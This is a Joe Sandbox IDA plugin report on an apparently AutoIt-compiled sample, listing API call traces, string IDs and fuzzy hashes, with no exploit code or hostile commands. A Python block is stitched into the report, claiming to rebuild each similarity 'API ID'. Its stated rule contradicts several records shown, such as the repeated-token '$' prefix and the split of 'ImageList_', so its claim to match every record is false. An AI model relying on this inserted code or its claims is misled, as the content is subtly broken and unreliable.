                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 78ac35fcf0bee188176dd4273c71493816d4999ae2e306effcbf39fec789e9f3
                                                          • Instruction ID: 2755ba030dddafd336afd2c885d09ce377eb8d4a957c84a89175cfb05e09d134
                                                          • Opcode Fuzzy Hash: 78ac35fcf0bee188176dd4273c71493816d4999ae2e306effcbf39fec789e9f3
                                                          • Instruction Fuzzy Hash: E1113C766106009FD711EF29D845A2AB7E9EF85324F00851EF9AADB391DB30A800CB91
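The "API ID" under each Similarity heading is the key the IDA plugin uses to match a function against the same function in other samples, and it can be rebuilt from the API list printed just above it. The Python below does that for every record on this page whose API list is visible. It is an added example, not Joe Sandbox code: the construction rule (split CamelCase names into tokens, drop tokens of three characters or fewer, put repeated tokens in a sorted prefix before "$", then append the remaining tokens in ASCII order) is inferred from the records above and is an assumption, not the plugin's documented algorithm. The numeric "API String ID" hash is not reproduced. The sample record embedded in the block is a constructed copy of this page's Toolhelp32 enumeration record.

```python
"""Rebuild a Joe Sandbox IDA-plugin "API ID" from a function's listed API calls.

Added example, not Joe Sandbox code. The rule below is inferred from the
records on this page and reproduces every visible "API ID" on it; it is an
assumption, not the plugin's documented algorithm:
  1. take each called API name without its module suffix or argument list,
  2. split CamelCase names into tokens; names with no capitals stay whole,
  3. drop tokens of three characters or fewer (Get, Set, Is, Co, Ex, Sid,
     the charset suffixes A/W, the leading "__" of CRT names),
  4. tokens seen more than once form a sorted prefix terminated by "$",
  5. the remaining tokens are sorted in ASCII order and concatenated.
"""
import re
from collections import Counter

# One line of the report's "APIs" list, e.g.
#   • Process32FirstW.KERNEL32(00000000,?), ref: 003BEF5F
#   • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([^\s(]+)")
# CamelCase splitter: a capital plus what follows it, or a run with no capitals.
_TOKEN = re.compile(r"[A-Z][^A-Z]*|[^A-Z]+")
# Inferred cut-off: "Proc", "Last", "bind" survive; "Get", "Sid", "Co" do not.
_MIN_TOKEN_LEN = 4

# Constructed copy of this page's Toolhelp32 record, used as sample input.
TOOLHELP_RECORD = """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 003BEF51
• Process32FirstW.KERNEL32(00000000,?), ref: 003BEF5F
  • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
• Process32NextW.KERNEL32(00000000,?), ref: 003BF01F
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 003BF02E
"""


def parse_api_lines(text: str) -> list[str]:
    """Return bare API names (module and arguments removed), in call order."""
    names = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if m:
            # "Foo.KERNEL32" -> "Foo"; "std::exception::exception.LIBCMT" keeps its "::".
            names.append(m.group(1).rsplit(".", 1)[0])
    return names


def tokenize(name: str) -> list[str]:
    """Split one API name into the tokens that survive the length cut-off."""
    return [t for t in _TOKEN.findall(name) if len(t) >= _MIN_TOKEN_LEN]


def api_id(names: list[str]) -> str:
    """Build the similarity key for a function from its API names."""
    counts = Counter(t for n in names for t in tokenize(n))
    repeated = sorted(t for t, c in counts.items() if c > 1)
    single = sorted(t for t, c in counts.items() if c == 1)
    prefix = "".join(repeated) + "$" if repeated else ""
    return prefix + "".join(single)


def api_id_from_record(text: str) -> str:
    """Parse a pasted "APIs" block from the report and return its API ID."""
    return api_id(parse_api_lines(text))


if __name__ == "__main__":
    print(api_id_from_record(TOOLHELP_RECORD))
    # Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
```

Because the key discards short tokens and call order, two functions with the same set of meaningful API tokens get the same ID even if the compiler reordered calls; that makes it a useful pivot for locating the same AutoIt runtime routine (the privilege adjustment, the admin-group check, the process enumeration) across samples, but it says nothing about the code between the calls, which is what the opcode and instruction fuzzy hashes cover.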
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003B957D,?,003CFB84,?), ref: 003AA121
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003B957D,?,003CFB84,?), ref: 003AA133
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00398631), ref: 00398508
                                                          • CloseHandle.KERNEL32(?,?,00398631), ref: 0039851A
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00368ED7,?,?,?,00000001), ref: 0036A2DA
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0036A2E3
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 003B403A
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          APIs
                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 003A4D1D
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003986B1), ref: 00398A93
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00382171
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036A2AA
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4
                                                          • API String ID: 0-4088798008
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 0fe7ee07ae1ffac9c2f0795d3fafacfd297de7932efaa3d480aba9115804d7e7
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: F6C15E3261519309DF6F463A843413EBEA15AA27B231F976DE4B3DF1D8EF20C564E620
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,003CF910), ref: 003C3690
                                                          • IsWindowVisible.USER32(?), ref: 003C36B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 0b484c8cbf1c169d30a033ef08e5cb4666012b3f371308f253616636924fe1d1
                                                          • Instruction ID: b3995995cd97b77dc09911c7e1a785ff803ebcbf6be741fc5352252c0c27275f
                                                          • Opcode Fuzzy Hash: 0b484c8cbf1c169d30a033ef08e5cb4666012b3f371308f253616636924fe1d1
                                                          • Instruction Fuzzy Hash: 74D17D342143019BCB16EF10C491F6EB7AAAF95354F14855DF8869F7A2CB31EE1ACB81
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 003CA662
                                                          • GetSysColorBrush.USER32(0000000F), ref: 003CA693
                                                          • GetSysColor.USER32(0000000F), ref: 003CA69F
                                                          • SetBkColor.GDI32(?,000000FF), ref: 003CA6B9
                                                          • SelectObject.GDI32(?,00000000), ref: 003CA6C8
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA6F3
                                                          • GetSysColor.USER32(00000010), ref: 003CA6FB
                                                          • CreateSolidBrush.GDI32(00000000), ref: 003CA702
                                                          • FrameRect.USER32(?,?,00000000), ref: 003CA711
                                                          • DeleteObject.GDI32(00000000), ref: 003CA718
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 003CA763
                                                          • FillRect.USER32(?,?,00000000), ref: 003CA795
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CA7C0
                                                            • Part of subcall function 003CA8FC: GetSysColor.USER32(00000012), ref: 003CA935
                                                            • Part of subcall function 003CA8FC: SetTextColor.GDI32(?,?), ref: 003CA939
                                                            • Part of subcall function 003CA8FC: GetSysColorBrush.USER32(0000000F), ref: 003CA94F
                                                            • Part of subcall function 003CA8FC: GetSysColor.USER32(0000000F), ref: 003CA95A
                                                            • Part of subcall function 003CA8FC: GetSysColor.USER32(00000011), ref: 003CA977
                                                            • Part of subcall function 003CA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA985
                                                            • Part of subcall function 003CA8FC: SelectObject.GDI32(?,00000000), ref: 003CA996
                                                            • Part of subcall function 003CA8FC: SetBkColor.GDI32(?,00000000), ref: 003CA99F
                                                            • Part of subcall function 003CA8FC: SelectObject.GDI32(?,?), ref: 003CA9AC
                                                            • Part of subcall function 003CA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 003CA9CB
                                                            • Part of subcall function 003CA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9E2
                                                            • Part of subcall function 003CA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9F7
                                                            • Part of subcall function 003CA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CAA1F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: 9517cbaeb5729422a73b93b391211917893fa3d25261eec8106d5e389ca7c2de
                                                          • Instruction ID: fcdd7109fd7219637a12efad3a72f6883363c5f57784ecee3cf67600d1ae22d8
                                                          • Opcode Fuzzy Hash: 9517cbaeb5729422a73b93b391211917893fa3d25261eec8106d5e389ca7c2de
                                                          • Instruction Fuzzy Hash: DE917C72008705EFD7129F64DC08E5B7BAEFF89325F144A29FAA2D61A0C771E944CB52
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00342CA2
                                                          • DeleteObject.GDI32(00000000), ref: 00342CE8
                                                          • DeleteObject.GDI32(00000000), ref: 00342CF3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00342CFE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00342D09
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0037C5BB
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0037C5F4
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0037CA1D
                                                            • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                                          • SendMessageW.USER32(?,00001053), ref: 0037CA5A
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0037CA71
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0037CA87
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0037CA92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: ccd58e0a25d946009749bf111f9eed5608dcd9540cc89f1d49262e64e2bc9673
                                                          • Instruction ID: 45ad79f442a574d4645c3552a4e7a08ed05345c51b56e064d0a46e54f609a71f
                                                          • Opcode Fuzzy Hash: ccd58e0a25d946009749bf111f9eed5608dcd9540cc89f1d49262e64e2bc9673
                                                          • Instruction Fuzzy Hash: 0B128A30610201AFCB26CF24C884BAAB7E5FF05311F55956DF999EB662CB35EC42CB51
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 003B75F3
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B76B2
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003B76F0
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003B7702
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003B7748
                                                          • GetClientRect.USER32(00000000,?), ref: 003B7754
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003B7798
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B77A7
                                                          • GetStockObject.GDI32(00000011), ref: 003B77B7
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003B77BB
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003B77CB
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B77D4
                                                          • DeleteDC.GDI32(00000000), ref: 003B77DD
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B7809
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B7820
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003B785B
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B786F
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B7880
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003B78B0
                                                          • GetStockObject.GDI32(00000011), ref: 003B78BB
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B78C6
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003B78D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 5fae26cdda3dbb517f12f7a51fc46386c1c502a3007cebf028fa2890ecb076f1
                                                          • Instruction ID: 391c70d1ac3d065597667cec2c3f47f59536d96e3e6006d5b757b518f7dfd26f
                                                          • Opcode Fuzzy Hash: 5fae26cdda3dbb517f12f7a51fc46386c1c502a3007cebf028fa2890ecb076f1
                                                          • Instruction Fuzzy Hash: 73A14CB1A40615BFEB159BA8DD4AFAF7BA9EB44714F004158FA15EB2E0C770AD00CF64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AADAA
                                                          • GetDriveTypeW.KERNEL32(?,003CFAC0,?,\\.\,003CF910), ref: 003AAE87
                                                          • SetErrorMode.KERNEL32(00000000,003CFAC0,?,\\.\,003CF910), ref: 003AAFE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 5cd4a0fb2c4db0fab75ae753ea66cdd16716ff8e488d43852544d8e6a798b22f
                                                          • Instruction ID: b476c6b30b9b74e39268abab3baab9b610e298dac86e25211a971fbce3013bf8
                                                          • Opcode Fuzzy Hash: 5cd4a0fb2c4db0fab75ae753ea66cdd16716ff8e488d43852544d8e6a798b22f
                                                          • Instruction Fuzzy Hash: 1F5183B6648A099FCB0BDB10CD92DBDB3F5EB067007204556FA06AB691CB71ED41DB83
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: 29d8118a7392948b80f0aba6393c2312abe45d0dbac789dee0bbdeafb52927bb
                                                          • Instruction ID: 0c27a51e47f64ab2363ee03f0c5aece8fb03a747f44e3410c686b349f209af7e
                                                          • Opcode Fuzzy Hash: 29d8118a7392948b80f0aba6393c2312abe45d0dbac789dee0bbdeafb52927bb
                                                          • Instruction Fuzzy Hash: 0381F871600605ABDB27AF61CC83FAF77E8EF16700F048025F945AE197EB64EE51C6A1
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003C9B04
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003C9BBD
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 003C9BD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: c6c2e4e1ec7005580bbd2a937a6e7d329af26d0c12f731c7227f2b08395c9c30
                                                          • Instruction ID: 3c14017427e2d8433f4ab4e1e5f7773f9b89dd802565963388d0ad218f91b9b6
                                                          • Opcode Fuzzy Hash: c6c2e4e1ec7005580bbd2a937a6e7d329af26d0c12f731c7227f2b08395c9c30
                                                          • Instruction Fuzzy Hash: 8E02CC31108201AFDB26CF24C848FAABBE9FF49355F06852EF995D62A1C734DD54CB92
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 003CA935
                                                          • SetTextColor.GDI32(?,?), ref: 003CA939
                                                          • GetSysColorBrush.USER32(0000000F), ref: 003CA94F
                                                          • GetSysColor.USER32(0000000F), ref: 003CA95A
                                                          • CreateSolidBrush.GDI32(?), ref: 003CA95F
                                                          • GetSysColor.USER32(00000011), ref: 003CA977
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA985
                                                          • SelectObject.GDI32(?,00000000), ref: 003CA996
                                                          • SetBkColor.GDI32(?,00000000), ref: 003CA99F
                                                          • SelectObject.GDI32(?,?), ref: 003CA9AC
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA9CB
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9E2
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9F7
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CAA1F
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003CAA46
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 003CAA64
                                                          • DrawFocusRect.USER32(?,?), ref: 003CAA6F
                                                          • GetSysColor.USER32(00000011), ref: 003CAA7D
                                                          • SetTextColor.GDI32(?,00000000), ref: 003CAA85
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003CAA99
                                                          • SelectObject.GDI32(?,003CA62C), ref: 003CAAB0
                                                          • DeleteObject.GDI32(?), ref: 003CAABB
                                                          • SelectObject.GDI32(?,?), ref: 003CAAC1
                                                          • DeleteObject.GDI32(?), ref: 003CAAC6
                                                          • SetTextColor.GDI32(?,?), ref: 003CAACC
                                                          • SetBkColor.GDI32(?,?), ref: 003CAAD6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 423bf8cd67e2a8a9e353a4506ee23f87ba238787b7f33ad2d519adcc8a476e33
                                                          • Instruction ID: fb8432c4a3c398fb4dbad905a046a75e47e134c739e06741c6ce6dd969cf6b50
                                                          • Instruction Fuzzy Hash: 30513C71900608FFDB129FA4DC49EAE7B7AEB08320F154625F911EB2A1D771AD40DF90
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C8AF3
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8B04
                                                          • CharNextW.USER32(0000014E), ref: 003C8B33
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C8B74
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C8B8A
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8B9B
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003C8BB8
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003C8C0A
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003C8C20
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C8C51
                                                          • _memset.LIBCMT ref: 003C8C76
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003C8CBF
                                                          • _memset.LIBCMT ref: 003C8D1E
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C8D48
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C8DA0
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 003C8E4D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003C8E6F
